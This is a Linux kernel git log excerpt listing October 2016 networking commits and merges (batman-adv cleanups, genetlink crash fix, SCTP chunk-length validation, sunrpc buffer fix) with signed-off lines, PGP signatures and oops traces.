During broadcast queueing, the skb_reset_mac_header() sets the skb
to a place invalid for a MAC header, pointing right into the
batman-adv broadcast packet. Luckily, no one seems to actually use
eth_hdr(skb) afterwards until batadv_send_skb_packet() resets the
header to a valid position again.

Therefore removing this unnecessary, weird skb_reset_mac_header()
call.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:34 +01:00
Linus Lüssing
b77697633d batman-adv: Remove unnecessary lockdep in batadv_mcast_mla_list_free
batadv_mcast_mla_list_free() just frees some leftovers of a local feast
in batadv_mcast_mla_update(). No lockdep needed as it has nothing to do
with bat_priv->mcast.mla_list.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:34 +01:00
Linus Lüssing
cbfc16de30 batman-adv: Add wrapper for ARP reply creation
Removing duplicate code.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:33 +01:00
Sven Eckelmann
75721643d5 batman-adv: Close two alignment holes in batadv_hard_iface
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:33 +01:00
Sven Eckelmann
ce1a21d142 batman-adv: Mark batadv_netlink_ops as const
The genl_ops don't need to be written by anyone and thus can be moved in a
ro memory range.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:32 +01:00
Sven Eckelmann
9bcb94c861 batman-adv: Introduce missing headers for genetlink restructure
Fixes: 56989f6d85 ("genetlink: mark families as __ro_after_init")
Fixes: 2ae0f17df1 ("genetlink: use idr to track families")
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-30 11:11:32 +01:00
Linus Torvalds
2a26d99b25 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:
 "Lots of fixes, mostly drivers as is usually the case.

   1) Don't treat zero DMA address as invalid in vmxnet3, from Alexey
      Khoroshilov.

   2) Fix element timeouts in netfilter's nft_dynset, from Anders K.
      Pedersen.

   3) Don't put aead_req crypto struct on the stack in mac80211, from
      Ard Biesheuvel.

   4) Several uninitialized variable warning fixes from Arnd Bergmann.

   5) Fix memory leak in cxgb4, from Colin Ian King.

   6) Fix bpf handling of VLAN header push/pop, from Daniel Borkmann.

   7) Several VRF semantic fixes from David Ahern.

   8) Set skb->protocol properly in ip6_tnl_xmit(), from Eli Cooper.

   9) Socket needs to be locked in udp_disconnect(), from Eric Dumazet.

  10) Div-by-zero on 32-bit fix in mlx4 driver, from Eugenia Emantayev.

  11) Fix stale link state during failover in NCSCI driver, from Gavin
      Shan.

  12) Fix netdev lower adjacency list traversal, from Ido Schimmel.

  13) Propvide proper handle when emitting notifications of filter
      deletes, from Jamal Hadi Salim.

  14) Memory leaks and big-endian issues in rtl8xxxu, from Jes Sorensen.

  15) Fix DESYNC_FACTOR handling in ipv6, from Jiri Bohac.

  16) Several routing offload fixes in mlxsw driver, from Jiri Pirko.

  17) Fix broadcast sync problem in TIPC, from Jon Paul Maloy.

  18) Validate chunk len before using it in SCTP, from Marcelo Ricardo
      Leitner.

  19) Revert a netns locking change that causes regressions, from Paul
      Moore.

  20) Add recursion limit to GRO handling, from Sabrina Dubroca.

  21) GFP_KERNEL in irq context fix in ibmvnic, from Thomas Falcon.

  22) Avoid accessing stale vxlan/geneve socket in data path, from
      Pravin Shelar"

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (189 commits)
  geneve: avoid using stale geneve socket.
  vxlan: avoid using stale vxlan socket.
  qede: Fix out-of-bound fastpath memory access
  net: phy: dp83848: add dp83822 PHY support
  enic: fix rq disable
  tipc: fix broadcast link synchronization problem
  ibmvnic: Fix missing brackets in init_sub_crq_irqs
  ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context
  Revert "ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context"
  arch/powerpc: Update parameters for csum_tcpudp_magic & csum_tcpudp_nofold
  net/mlx4_en: Save slave ethtool stats command
  net/mlx4_en: Fix potential deadlock in port statistics flow
  net/mlx4: Fix firmware command timeout during interrupt test
  net/mlx4_core: Do not access comm channel if it has not yet been initialized
  net/mlx4_en: Fix panic during reboot
  net/mlx4_en: Process all completions in RX rings after port goes up
  net/mlx4_en: Resolve dividing by zero in 32-bit system
  net/mlx4_core: Change the default value of enable_qos
  net/mlx4_core: Avoid setting ports to auto when only one port type is supported
  net/mlx4_core: Fix the resource-type enum in res tracker to conform to FW spec
  ...
2016-10-29 20:33:20 -07:00
pravin shelar
0e82c76359 genetlink: Fix generic netlink family unregister
This patch fixes a typo in unregister operation.

Following crash is fixed by this patch. It can be easily reproduced
by repeating modprobe and rmmod module that uses genetlink.

[  261.446686] BUG: unable to handle kernel paging request at ffffffffa0264088
[  261.448921] IP: [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.450494] PGD 1c09067
[  261.451266] PUD 1c0a063
[  261.452091] PMD 8068d5067
[  261.452525] PTE 0
[  261.453164]
[  261.453618] Oops: 0000 [#1] SMP
[  261.454577] Modules linked in: openvswitch(+) ...
[  261.480753] RIP: 0010:[<ffffffff813cb70e>]  [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.483069] RSP: 0018:ffffc90003c0bc28  EFLAGS: 00010282
[  261.510145] Call Trace:
[  261.510896]  [<ffffffff816f10ca>] genl_family_find_byname+0x5a/0x70
[  261.512819]  [<ffffffff816f2319>] genl_register_family+0xb9/0x630
[  261.514805]  [<ffffffffa02840bc>] dp_init+0xbc/0x120 [openvswitch]
[  261.518268]  [<ffffffff8100217d>] do_one_initcall+0x3d/0x160
[  261.525041]  [<ffffffff811808a9>] do_init_module+0x60/0x1f1
[  261.526754]  [<ffffffff8110687f>] load_module+0x22af/0x2860
[  261.530144]  [<ffffffff81107026>] SYSC_finit_module+0x96/0xd0
[  261.531901]  [<ffffffff8110707e>] SyS_finit_module+0xe/0x10
[  261.533605]  [<ffffffff8100391e>] do_syscall_64+0x6e/0x180
[  261.535284]  [<ffffffff817c2faf>] entry_SYSCALL64_slow_path+0x25/0x25
[  261.546512] RIP  [<ffffffff813cb70e>] strcmp+0xe/0x30
[  261.550198] ---[ end trace 76505a814dd68770 ]---

Fixes: 2ae0f17df1 ("genetlink: use idr to track families").

Reported-by: Jarno Rajahalme <jarno@ovn.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Pravin B Shelar <pshelar@ovn.org>
Reviewed-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 20:58:15 -04:00
David S. Miller
32ab0a38f0 Among various cleanups and improvements, we have the following:
* client FILS authentication support in mac80211 (Jouni)
  * AP/VLAN multicast improvements (Michael Braun)
  * config/advertising support for differing beacon intervals on
    multiple virtual interfaces (Purushottam Kushwaha, myself)
  * deprecate the old WDS mode for cfg80211-based drivers, the
    mode is hardly usable since it doesn't support any "modern"
    features like WPA encryption (2003), HT (2009) or VHT (2014),
    I'm not even sure WEP (introduced in 1997) could be done.
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYEy/9AAoJEGt7eEactAAd/V0P/0FmHGS8HjlSjm+1p6sbWKbt
 5v8bb3cuKHQiYiUM6euIXql2OYuOEHVAQEpNoPXN9CsfKFYgbIH6yW6d8HtKNedV
 n9lmMy/U6yJX9nYt7yMIQ3kLkbEg+YU58B9Hf47waWXLLSNVumS8rfNBn43EoNQf
 VKWYPWpetsCRIWJ1fnLuxvMHCtOOYCxH+491BUonof32+DKPEAsAbnszZ2ElufTR
 7KNyA3K6leOtTd5Ml52dvLOGNc+h2C83VAMxiShq/6r8OnlX5tPifaubzd9n3m41
 jiJJH/92ESrtF2AaWEm8slcgtcfHS/O7y/FSoV4r0PMSvPTBdjwQ9nqCsbONd831
 vjj6c6YWNxgHPcISX0XcWz+FHnLJdUGaDUtHjAJYw4oH4gaRXwfSw0U+jvdlSMUf
 2CBUArk5f0OEguzwa/5X4Jio3OPPIj4jY/lKplcpLOUu8K2FWTLDuIlww/FHXovs
 rDzTLQeXZkx+MkszkTJN42qSEfOFly91J6OA2Wju+emBqrLIbkAGmvyLVg8U8BQd
 gG7oltgmZ6Xg6fEnUQqpIDO7UJlQ+GXAU04SpNDMv1j/ueUJskxlr3hYM7E9ueQv
 LJcZcVV0RAwNRw52cEsdcYCMLuSMYRrO1OHlkl0wd+x2hFrUCWnVzUgLEUhNBV+c
 ICmNMr96nKhrZI217yzF
 =SjfQ
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-next-for-davem-2016-10-28' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211-next

Johannes Berg says:

====================
Among various cleanups and improvements, we have the following:
 * client FILS authentication support in mac80211 (Jouni)
 * AP/VLAN multicast improvements (Michael Braun)
 * config/advertising support for differing beacon intervals on
   multiple virtual interfaces (Purushottam Kushwaha, myself)
 * deprecate the old WDS mode for cfg80211-based drivers, the
   mode is hardly usable since it doesn't support any "modern"
   features like WPA encryption (2003), HT (2009) or VHT (2014),
   I'm not even sure WEP (introduced in 1997) could be done.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:28:45 -04:00
Jon Paul Maloy
06bd2b1ed0 tipc: fix broadcast link synchronization problem
In commit 2d18ac4ba7 ("tipc: extend broadcast link initialization
criteria") we tried to fix a problem with the initial synchronization
of broadcast link acknowledge values. Unfortunately that solution is
not sufficient to solve the issue.

We have seen it happen that LINK_PROTOCOL/STATE packets with a valid
non-zero unicast acknowledge number may bypass BCAST_PROTOCOL
initialization, NAME_DISTRIBUTOR and other STATE packets with invalid
broadcast acknowledge numbers, leading to premature opening of the
broadcast link. When the bypassed packets finally arrive, they are
inadvertently accepted, and the already correctly initialized
acknowledge number in the broadcast receive link is overwritten by
the invalid (zero) value of the said packets. After this the broadcast
link goes stale.

We now fix this by marking the packets where we know the acknowledge
value is or may be invalid, and then ignoring the acks from those.

To this purpose, we claim an unused bit in the header to indicate that
the value is invalid. We set the bit to 1 in the initial BCAST_PROTOCOL
synchronization packet and all initial ("bulk") NAME_DISTRIBUTOR
packets, plus those LINK_PROTOCOL packets sent out before the broadcast
links are fully synchronized.

This minor protocol update is fully backwards compatible.

Reported-by: John Thompson <thompa.atl@gmail.com>
Tested-by: John Thompson <thompa.atl@gmail.com>
Signed-off-by: Jon Maloy <jon.maloy@ericsson.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:21:09 -04:00
Neal Cardwell
9b9375b5b7 tcp_bbr: add a state transition diagram and accompanying comment
Document the possible state transitions for a BBR flow, and also add a
prose summary of the state machine, covering the life of a typical BBR
flow.

Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 17:12:43 -04:00
David S. Miller
a283ad5066 This code cleanup patchset includes the following changes (chronological
order):
 
  - bump version strings, by Simon Wunderlich
 
  - README updates/clean up, by Sven Eckelmann (4 patches)
 
  - Code clean up and restructuring by Sven Eckelmann (2 patches)
 
  - Kerneldoc fix in forw_packet structure, by Linus Luessing
 
  - Remove unused argument in dbg_arp, by Antonio Quartulli
 
  - Add support to build batman-adv without wireless, by Linus Luessing
 
  - Restructure error handling for is_ap_isolated, by Markus Elfring
 
  - Remove unused initialization in various functions, by Sven Eckelmann
 
  - Use better names for fragment and gateway list heads, by Sven
    Eckelmann (2 patches)
 
  - Convert to octal permissions for files, by Sven Eckelmann
 
  - Avoid precedence issues for some macros, by Sven Eckelmann
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdBQJYEk4JFhxzd0BzaW1vbnd1bmRlcmxpY2guZGUACgkQoSvjmEKS
 nqFEXQ/+M5JTsV+6oN6yknj30D8HpBKp785UiLbKeu7AadpA3KUn/kDbivihF0Cq
 YrfORAbXyGY/CNrSbx0rZbC79jyBSuvSt9whI92rPsmAvbkeypRdOSpKz5HbkNTh
 MxPblI29AvBwIMH5I+vW9iZvqxpdtJh0h/zCT0db5NQVCW7sVpfIMhCJvOULMFJj
 WuPS/YXA4rBW2RJtGHrAy//byhF7ng26qCV06Bxy5xwKK/ncZX5GmgZVrZ5YWgO6
 3kcEjLL1iASnYAoUu6X5PWeT3SZLutlZ2sWu8O3X7ShtpRT48Uisj1OFlIOgOGc5
 fF2iFxWAUlEt8gu4aAADVnknANPMdChfvJG9w9XOlXte4bJtKpr8dJz/jhHiPMYb
 NScHhpAcdpkFSej8RUHibIC+TjVc50vOqPCFtM0smKQ7cgyWNU+V1Bo5pXMkYGA8
 7OhbWJ87mOkPWj2Yr/YeWHhvnrwbnyZFMSaPHJuCOei+zsgCpAtjPK8InfzDQoWu
 UlRBgaO7zxEDUlmaAHHBUOCNB0uM1H8LR1opi7GjPdNUbONyN2mris3nz9UB1aL3
 +b9bWiNzNh6DsEF+UEJfHW/Nrx+yI7mMQw5/zOknhdHUhFTM3kPbWNYdJfo0yPgn
 KSq2tr4mmGLySFsPEVQI5QBDT2iF0Ee7P6PMlA/J64dwSJj+Mc8=
 =eDGz
 -----END PGP SIGNATURE-----

Merge tag 'batadv-next-for-davem-20161027' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
This code cleanup patchset includes the following changes (chronological
order):

 - bump version strings, by Simon Wunderlich

 - README updates/clean up, by Sven Eckelmann (4 patches)

 - Code clean up and restructuring by Sven Eckelmann (2 patches)

 - Kerneldoc fix in forw_packet structure, by Linus Luessing

 - Remove unused argument in dbg_arp, by Antonio Quartulli

 - Add support to build batman-adv without wireless, by Linus Luessing

 - Restructure error handling for is_ap_isolated, by Markus Elfring

 - Remove unused initialization in various functions, by Sven Eckelmann

 - Use better names for fragment and gateway list heads, by Sven
   Eckelmann (2 patches)

 - Convert to octal permissions for files, by Sven Eckelmann

 - Avoid precedence issues for some macros, by Sven Eckelmann
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 16:26:50 -04:00
shamir rabinovitch
ff57087f31 rds: debug messages are enabled by default
rds use Kconfig option called "RDS_DEBUG" to enable rds debug messages.
This option cause the rds Makefile to add -DDEBUG to the rds gcc command
line.

When CONFIG_DYNAMIC_DEBUG is enabled, the "DEBUG" macro is used by
include/linux/dynamic_debug.h to decide if dynamic debug prints should
be sent by default to the kernel log.

rds should not enable this macro for production builds. rds dynamic
debug work as expected follow this fix.

Signed-off-by: Shamir Rabinovitch <shamir.rabinovitch@oracle.com>
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Reviewed-by: Wengang Wang <wen.gang.wang@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:55:57 -04:00
David S. Miller
880b583ce1 Just two fixes:
* a fix to process all events while suspending, so any
    potential calls into the driver are done before it is
    suspended
  * small markup fixes for the sphinx documentation conversion
    that's coming into the tree via the doc tree
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJYEbSGAAoJEGt7eEactAAdOo4P/A1RyOl2uTspwB4lZFMMA5Tp
 IIwaB+WlNcjGq05C8kemdQJ30AKJUy6aKMTb5FIuFXWLRK6u5uIoQsYe6cRI8WBs
 bgTpo5RMcNGx6dUgFS/XwM2bLXUNXAXOt+43c2kWSjnqQZpQuSXh8/4R8ybZxyZB
 SNyKCzkx1LYPox4Qnufmi+pz/hI8hHRY7gMdyhUWU2uUk9u/nuY0Zxyvj4OFgyow
 SOGasCPoDzT9556hUGyG9M8HmwBiRZUzfzo5mSR2V0a9Tij4ZOvoSkcAUDbj38fZ
 0UPJ48xwUDMF88W+NEO+rrd1IQXtlsHJk6x/mAQpSkEvzymb5BEvraVeTV3+chgo
 fn45ZDP/GbTwqJ3YacSmKgyGwaGPF9XN2+Iuxotp0UeuYxvxwnkWNr0JbRecDPau
 ZL/P2qV7Y3gjy0+6nHafrYIYPuPFZjwPIJ7k6x7mVtO6zfJhtKF57YP/YoFYD78l
 TtCEE5o7lAYkdWKa2nm4Fg16NM897PS/GTM9dQCFtnYLV7ynZPY2TGf4TelqJ3cz
 FU1/vlM0t/jRkkRKIhlmy8re4ASjTEccf//dllz1CDyPdxHY1NmGftftz539s7qW
 NpCvvO0IXDchBT1jeoSMwcMzlZSfQeIKtkp1P0z4lyPiMcmekdgUQ7sb84FhwSa+
 SYRpiZ/Xv6xa5Djhonci
 =toQY
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-10-27' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
Just two fixes:
 * a fix to process all events while suspending, so any
   potential calls into the driver are done before it is
   suspended
 * small markup fixes for the sphinx documentation conversion
   that's coming into the tree via the doc tree
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:54:16 -04:00
David Ahern
46b5ab1a7c net: dev: Fix non-RCU based lower dev walker
netdev_walk_all_lower_dev is not properly walking the lower device
list.  Commit 1a3f060c1a made netdev_walk_all_lower_dev similar
to netdev_walk_all_upper_dev_rcu and netdev_walk_all_lower_dev_rcu
but failed to update its netdev_next_lower_dev iterator. This patch
fixes that.

Fixes: 1a3f060c1a ("net: Introduce new api for walking upper and
                     lower devices")
Reported-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Tested-by: Ido Schimmel <idosch@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:50:30 -04:00
Florian Westphal
b917783c7b flow_dissector: __skb_get_hash_symmetric arg can be const
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:10:21 -04:00
Eric Dumazet
5ea8ea2cb7 tcp/dccp: drop SYN packets if accept queue is full
Per listen(fd, backlog) rules, there is really no point accepting a SYN,
sending a SYNACK, and dropping the following ACK packet if accept queue
is full, because application is not draining accept queue fast enough.

This behavior is fooling TCP clients that believe they established a
flow, while there is nothing at server side. They might then send about
10 MSS (if using IW10) that will be dropped anyway while server is under
stress.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:09:21 -04:00
David S. Miller
ad60133909 Here are three batman-adv bugfix patches:
- Fix RCU usage for neighbor list, by Sven Eckelmann
 
  - Fix BATADV_DBG_ALL loglevel to include TP Meter messages, by Sven Eckelmann
 
  - Fix possible splat when disabling an interface, by Linus Luessing
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdBQJYENCVFhxzd0BzaW1vbnd1bmRlcmxpY2guZGUACgkQoSvjmEKS
 nqFEdA/9HItVGDUIWhLhLRPJFsPSWaENQ1SFaYACHn7zYTMMmbu4uVjMDqlITcu2
 aDyPcgbAkjGPDCDsX6ON6FsJHoovXiKUQCbri45jTgye4Gc0zmh7+Aj/MusCy20s
 U+hYvJ5jTEKFgqh96fc5ot8qxLBveBKrzLa6L+RO2pZmB15ZF/AexCOxUdM56PuL
 nITvewDXJLCbdY4V555K3m2B8cPo2O/Q4eTBg9bwKHG+lGpHqF9qDmlX7S1selcI
 F9toA6XO1e5fRNMbcHR0BxC0ZhJufCWi0ZGylW8M0HwmUVO1+QttVORkN4ECBQOu
 /J6rGfSZbZIRlQ9uGiqqBRkyGBVcoNoNn9mz9c0l9tNQ2AtfW98EXZbtHm8m/BQL
 UgDndVoFW/RHxBsF9IwavSCWBpAg5RAVvV+XwlH07A0WuOehxOV+UkbXzFD1z7Yb
 c+4wuLgfdNTiV8ttfC25lb5PpYo8g8wZf65sGfw3Ej+6iCSQplakoPzuE5kqiMBR
 Q45vELled0elY8GiaNKhrwB42daN7lctn36vL+SfP0R49FtymnaeCDBnH8L7lYVn
 VUP1Fls8BOA2zi1GKKWOMortgxZLynMWleNJC+5Noa04JX8nyMgNJyof85UkaTz+
 QZ/WK4D8gwWfrkWvTH2UQM0iDOcgURWhKu6T8yhlbmymocnSVZI=
 =/5y8
 -----END PGP SIGNATURE-----

Merge tag 'batadv-net-for-davem-20161026' of git://git.open-mesh.org/linux-merge

Simon Wunderlich says:

====================
Here are three batman-adv bugfix patches:

 - Fix RCU usage for neighbor list, by Sven Eckelmann

 - Fix BATADV_DBG_ALL loglevel to include TP Meter messages, by Sven Eckelmann

 - Fix possible splat when disabling an interface, by Linus Luessing
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:05:53 -04:00
Willem de Bruijn
104ba78c98 packet: on direct_xmit, limit tso and csum to supported devices
When transmitting on a packet socket with PACKET_VNET_HDR and
PACKET_QDISC_BYPASS, validate device support for features requested
in vnet_hdr.

Drop TSO packets sent to devices that do not support TSO or have the
feature disabled. Note that the latter currently do process those
packets correctly, regardless of not advertising the feature.

Because of SKB_GSO_DODGY, it is not sufficient to test device features
with netif_needs_gso. Full validate_xmit_skb is needed.

Switch to software checksum for non-TSO packets that request checksum
offload if that device feature is unsupported or disabled. Note that
similar to the TSO case, device drivers may perform checksum offload
correctly even when not advertising it.

When switching to software checksum, packets hit skb_checksum_help,
which has two BUG_ON checksum not in linear segment. Packet sockets
always allocate at least up to csum_start + csum_off + 2 as linear.

Tested by running github.com/wdebruij/kerneltools/psock_txring_vnet.c

  ethtool -K eth0 tso off tx on
  psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v
  psock_txring_vnet -d $dst -s $src -i eth0 -l 2000 -n 1 -q -v -N

  ethtool -K eth0 tx off
  psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G
  psock_txring_vnet -d $dst -s $src -i eth0 -l 1000 -n 1 -q -v -G -N

v2:
  - add EXPORT_SYMBOL_GPL(validate_xmit_skb_list)

Fixes: d346a3fae3 ("packet: introduce PACKET_QDISC_BYPASS socket option")
Signed-off-by: Willem de Bruijn <willemb@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:02:15 -04:00
Johannes Berg
4700e9ce6e net_sched actions: use nla_parse_nested()
Use nla_parse_nested instead of open-coding the call to
nla_parse() with the attribute data/len.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 15:01:01 -04:00
Ido Schimmel
c778453b13 switchdev: Remove redundant variable
Instead of storing return value in 'err' and returning, just return
directly.

Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reviewed-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:58:33 -04:00
Thomas Graf
b15ca182ed netlink: Add nla_memdup() to wrap kmemdup() use on nlattr
Wrap several common instances of:
	kmemdup(nla_data(attr), nla_len(attr), GFP_KERNEL);

Signed-off-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Johannes Berg <johannes@sipsolutions.net>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:57:42 -04:00
Arnd Bergmann
f8da977989 net: ip, diag: include net/inet_sock.h
The newly added raw_diag.c fails to build in some configurations
unless we include this header:

In file included from net/ipv4/raw_diag.c:6:0:
include/net/raw.h:71:21: error: field 'inet' has incomplete type
net/ipv4/raw_diag.c: In function 'raw_diag_dump':
net/ipv4/raw_diag.c:166:29: error: implicit declaration of function 'inet_sk'

Fixes: 432490f9d4 ("net: ip, diag -- Add diag interface for raw sockets")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:52:18 -04:00
Eli Cooper
ae148b0858 ip6_tunnel: Update skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit()
This patch updates skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit() when an
IPv6 header is installed to a socket buffer.

This is not a cosmetic change.  Without updating this value, GSO packets
transmitted through an ipip6 tunnel have the protocol of ETH_P_IP and
skb_mac_gso_segment() will attempt to call gso_segment() for IPv4,
which results in the packets being dropped.

Fixes: b8921ca83e ("ip4ip6: Support for GSO/GRO")
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 14:49:31 -04:00
Craig Gallek
e4cabca549 inet: Fix missing return value in inet6_hash
As part of a series to implement faster SO_REUSEPORT lookups,
commit 086c653f58 ("sock: struct proto hash function may error")
added return values to protocol hash functions and
commit 496611d7b5 ("inet: create IPv6-equivalent inet_hash function")
implemented a new hash function for IPv6.  However, the latter does
not respect the former's convention.

This properly propagates the hash errors in the IPv6 case.

Fixes: 496611d7b5 ("inet: create IPv6-equivalent inet_hash function")
Reported-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Craig Gallek <kraig@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 12:01:49 -04:00
Marcelo Ricardo Leitner
bf911e985d sctp: validate chunk len before actually using it
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.

The fix is to just move the check upwards so it's also validated for the
1st chunk.

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 12:00:10 -04:00
Jeff Layton
18e601d6ad sunrpc: fix some missing rq_rbuffer assignments
We've been seeing some crashes in testing that look like this:

BUG: unable to handle kernel NULL pointer dereference at           (null)
IP: [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
PGD 212ca2067 PUD 212ca3067 PMD 0
Oops: 0002 [#1] SMP
Modules linked in: rpcsec_gss_krb5 nfsv4 dns_resolver nfs fscache ppdev parport_pc i2c_piix4 sg parport i2c_core virtio_balloon pcspkr acpi_cpufreq nfsd auth_rpcgss nfs_acl lockd grace sunrpc ip_tables xfs libcrc32c sd_mod ata_generic pata_acpi virtio_scsi 8139too ata_piix libata 8139cp mii virtio_pci floppy virtio_ring serio_raw virtio
CPU: 1 PID: 1540 Comm: nfsd Not tainted 4.9.0-rc1 #39
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2007
task: ffff88020d7ed200 task.stack: ffff880211838000
RIP: 0010:[<ffffffff8135ce99>]  [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
RSP: 0018:ffff88021183bdd0  EFLAGS: 00010206
RAX: 0000000000000000 RBX: ffff88020d7fa000 RCX: 000000f400000000
RDX: 0000000000000014 RSI: ffff880212927020 RDI: 0000000000000000
RBP: ffff88021183be30 R08: 01000000ef896996 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff880211704ca8
R13: ffff88021473f000 R14: 00000000ef896996 R15: ffff880211704800
FS:  0000000000000000(0000) GS:ffff88021fc80000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000212ca1000 CR4: 00000000000006e0
Stack:
 ffffffffa01ea087 ffffffff63400001 ffff880215145e00 ffff880211bacd00
 ffff88021473f2b8 0000000000000004 00000000d0679d67 ffff880211bacd00
 ffff88020d7fa000 ffff88021473f000 0000000000000000 ffff88020d7faa30
Call Trace:
 [<ffffffffa01ea087>] ? svc_tcp_recvfrom+0x5a7/0x790 [sunrpc]
 [<ffffffffa01f84d8>] svc_recv+0xad8/0xbd0 [sunrpc]
 [<ffffffffa0262d5e>] nfsd+0xde/0x160 [nfsd]
 [<ffffffffa0262c80>] ? nfsd_destroy+0x60/0x60 [nfsd]
 [<ffffffff810a9418>] kthread+0xd8/0xf0
 [<ffffffff816dbdbf>] ret_from_fork+0x1f/0x40
 [<ffffffff810a9340>] ? kthread_park+0x60/0x60
Code: 00 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 07 4c 89 4f 08 4c 89 57 10 4c 89 5f 18 48 8d 7f 20 73 d4
RIP  [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
 RSP <ffff88021183bdd0>
CR2: 0000000000000000

Both Bruce and Eryu ran a bisect here and found that the problematic
patch was 68778945e4 (SUNRPC: Separate buffer pointers for RPC Call and
Reply messages).

That patch changed rpc_xdr_encode to use a new rq_rbuffer pointer to
set up the receive buffer, but didn't change all of the necessary
codepaths to set it properly. In particular the backchannel setup was
missing.

We need to set rq_rbuffer whenever rq_buffer is set. Ensure that it is.

